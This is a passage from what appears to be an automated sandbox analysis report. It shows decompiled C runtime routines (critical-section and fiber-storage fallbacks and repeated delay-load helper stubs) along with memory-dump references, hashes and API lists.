                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 23d4b5add5930630c5e8087e2518419ed69ad6d9893d00394545a586de65465f
                • Instruction ID: ebfd317954346581ec79e7820e585328081749a1d7a319ff155d7ffa5142ca7a
                • Opcode Fuzzy Hash: 23d4b5add5930630c5e8087e2518419ed69ad6d9893d00394545a586de65465f
                • Instruction Fuzzy Hash: E40148B250420DBBCF029F90DC06DEE7F66EF08750F014265FE186A1A0CA369A31EB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 21%
                			E003FAF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t14 = __ebx;
				_push(__ecx);
				_t8 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t8 ^ _t24;
				_t10 = E003FAC98(0x14, "InitializeCriticalSectionEx", 0x4079a0, "InitializeCriticalSectionEx"); // executed
				_t22 = _t10;
				if(_t22 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x403278(_a4, _a8, _a12);
					_t11 =  *_t22();
				}
				_pop(_t23);
				return E003EFBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
			}














                0x003faf0a
                0x003faf0a
                0x003faf0f
                0x003faf10
                0x003faf17
                0x003faf2c
                0x003faf31
                0x003faf38
                0x003faf55
                0x003faf3a
                0x003faf45
                0x003faf4b
                0x003faf4b
                0x003faf60
                0x003faf69

                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,003FA56F), ref: 003FAF55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: e6451ec29b6a8229d6af54932038bfb84a80393ccce66d7f168b999eea609c3f
                • Instruction ID: e34b5b0c9c8076a00dfec513009a4e87eb83c6a0d14c2f40c4826497c6dc84fd
                • Opcode Fuzzy Hash: e6451ec29b6a8229d6af54932038bfb84a80393ccce66d7f168b999eea609c3f
                • Instruction Fuzzy Hash: CCF0B4B1A4521CBFCB025F51CC06DAEBF65EF08711B404175FD08AA2A0DA755A10A7DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 19%
                			E003FADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t10 = __ebx;
				_push(__ecx);
				_t4 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t4 ^ _t20;
				_t6 = E003FAC98(3, "FlsAlloc", 0x407938, "FlsAlloc"); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0x403278(_a4);
					_t7 =  *_t18();
				}
				_pop(_t19);
				return E003EFBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}














                0x003fadaf
                0x003fadaf
                0x003fadb4
                0x003fadb5
                0x003fadbc
                0x003fadd1
                0x003fadd6
                0x003faddd
                0x003fadee
                0x003faddf
                0x003fade4
                0x003fadea
                0x003fadea
                0x003fadf9
                0x003fae02

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: 54afc82cf18fce503001da5e954d99ae7572c2c8c509071523577d05a13c0ea7
                • Instruction ID: 697c7a1d42a7d32f78585e99fcaba5fcc8b62ede434e2101d82fcc431042ae72
                • Opcode Fuzzy Hash: 54afc82cf18fce503001da5e954d99ae7572c2c8c509071523577d05a13c0ea7
                • Instruction Fuzzy Hash: B0E05CB0A8421C7BD2025B15CC12E3DBB54CB04721B0101B9F904B7280CD746E0042CE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE1F6() {

				E003EE85D(0x40c5ec, 0x43315c); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: dae80692cc746785ffac520206e3dd2a226e9f972815d997515978345ac3dc02
                • Instruction ID: d1fb35a7e10625ad54f2410563d26bed7546e69a05d6a1eeb1cc0730144d7e92
                • Opcode Fuzzy Hash: dae80692cc746785ffac520206e3dd2a226e9f972815d997515978345ac3dc02
                • Instruction Fuzzy Hash: 31B012D52580A0FC350957475C02D37010CC0C5F12330C33FFC15C45C0E954AC4C0835
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE1EC() {

				E003EE85D(0x40c5ec, 0x433160); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 75be9a6e4201657764d1d6afb4c53117c4614afeb42138239cf4c171a3563edb
                • Instruction ID: 24c5139fe448e7ae25872ba6da9abb7bd76987f720d2954408d1431511266958
                • Opcode Fuzzy Hash: 75be9a6e4201657764d1d6afb4c53117c4614afeb42138239cf4c171a3563edb
                • Instruction Fuzzy Hash: 9CB012D925C1A0FC3509528B5C42D37010CC0C4F12330833FFC15C44C0EA586C440535
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE1D1() {

				E003EE85D(0x40c5ec, 0x43316c); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b3c8016753bf7143c3f8b9c84aca72c30135712bb07451b5b59a4b9b95456a0b
                • Instruction ID: e0d5f884435e5cc6cda0594c0ce72ca9928ac1ee04a17d018cc074692b473a8c
                • Opcode Fuzzy Hash: b3c8016753bf7143c3f8b9c84aca72c30135712bb07451b5b59a4b9b95456a0b
                • Instruction Fuzzy Hash: 42B012D92581A0FC350912875C52C37010CC0C5F12330C73FFC11D48C0E954AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE23C() {

				E003EE85D(0x40c5ec, 0x433140); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 0988e6b3d9dd8e77fcfb4430a3ecfa48666c427fbb5ee0e3debfc8c4914889f8
                • Instruction ID: eed9895f7ff26ac0f37ecbbe58c6e65dfb01da9d11a5c3b6ff35f78633717408
                • Opcode Fuzzy Hash: 0988e6b3d9dd8e77fcfb4430a3ecfa48666c427fbb5ee0e3debfc8c4914889f8
                • Instruction Fuzzy Hash: D5B012E52580A0FC350956475C02D37011CC0C4F12330833FF815C44C0E9586D440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE232() {

				E003EE85D(0x40c5ec, 0x433144); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b15b1604627994caaa5df4d7a3381da24e29ba684bd63653899792d33aa759fa
                • Instruction ID: 07b3cfff507fa3584ebf830432caa650811ed963e7c92985caae1409b17df72a
                • Opcode Fuzzy Hash: b15b1604627994caaa5df4d7a3381da24e29ba684bd63653899792d33aa759fa
                • Instruction Fuzzy Hash: 7CB012E52580A0FC350956475D02D37011CC0C4F12330833FF815C44C0ED546E851435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE228() {

				E003EE85D(0x40c5ec, 0x433148); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 27631940c58a56c103dd1038fbef1ebd27318b1e7d219e3ecb3d75eaf9f96ed2
                • Instruction ID: c184a067abd3f0840e1461bf7748a87e5adb1699bad03383c357a12cd5b2f0b5
                • Opcode Fuzzy Hash: 27631940c58a56c103dd1038fbef1ebd27318b1e7d219e3ecb3d75eaf9f96ed2
                • Instruction Fuzzy Hash: 86B012E52581A0FC354956475C02D37011CC0C4F13330833FF815C44C0E9946D840435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE21E() {

				E003EE85D(0x40c5ec, 0x43314c); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 3ac255b6c0223a86ab705d886770332547508760f7b20867ded01204dd0b425f
                • Instruction ID: 7703d46d7bf89ee81423973d1317a906debb2eb2f13bdefe9bd431f22a566ee6
                • Opcode Fuzzy Hash: 3ac255b6c0223a86ab705d886770332547508760f7b20867ded01204dd0b425f
                • Instruction Fuzzy Hash: 6AB012E52580A0FC350956475C02D37011CC0C5F12330C33FFC15C44C0E954AD440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE20A() {

				E003EE85D(0x40c5ec, 0x433154); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 2ffac27221eeb98db410bc0ec9442a7c882f6aebe8abd7eac47d2dafcfbae329
                • Instruction ID: c2f67123907e137afcb7baba0d36ae1dd39ac5c5de24c1e53473b742042c290b
                • Opcode Fuzzy Hash: 2ffac27221eeb98db410bc0ec9442a7c882f6aebe8abd7eac47d2dafcfbae329
                • Instruction Fuzzy Hash: F3B012D52580A0FC350953475D02D37010CC0C4F12330C33FF815C45C0ED646D8D1835
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE200() {

				E003EE85D(0x40c5ec, 0x433158); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f24982257986db0948bf4e9d09c4dbd67817ae45b3a62028eb91a823e541d4de
                • Instruction ID: 331105994ab2cf4b0c7b44c5165c0f2c2659e03c13f6e40fb5330d4a103effcf
                • Opcode Fuzzy Hash: f24982257986db0948bf4e9d09c4dbd67817ae45b3a62028eb91a823e541d4de
                • Instruction Fuzzy Hash: 31B092952581A0FC354952465C02D36010CC084B12330833BB815C45C0A99468880835
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE26E() {

				E003EE85D(0x40c5ec, 0x43312c); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 475c652057be0ae1001eb58894f8b7a955c184ae34639914ceee6b915cf60e7b
                • Instruction ID: d295730dba23c21275dcf0a2db5b711db9007c8d04e9a4f3fac9920e07357343
                • Opcode Fuzzy Hash: 475c652057be0ae1001eb58894f8b7a955c184ae34639914ceee6b915cf60e7b
                • Instruction Fuzzy Hash: 34B012D52580A0FC350992575C02D37014CC0C5F12330C33FFC15C44C0EA54AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE264() {

				E003EE85D(0x40c5ec, 0x433130); // executed
				goto __eax;
			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 9b874b5285ac27dfc90e83af6d034af46fdaa9d616534141e3806b7cd071353a
                • Instruction ID: 0b0559f6a1456dc7aedeba3ca825462458cc125d786be1494a1cb116d4a5e39e
                • Opcode Fuzzy Hash: 9b874b5285ac27dfc90e83af6d034af46fdaa9d616534141e3806b7cd071353a
                • Instruction Fuzzy Hash: F5B012D52690E0FC350952475C02D3B014DC4C4F22730833FF856C44C0E9586C440435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE250() {

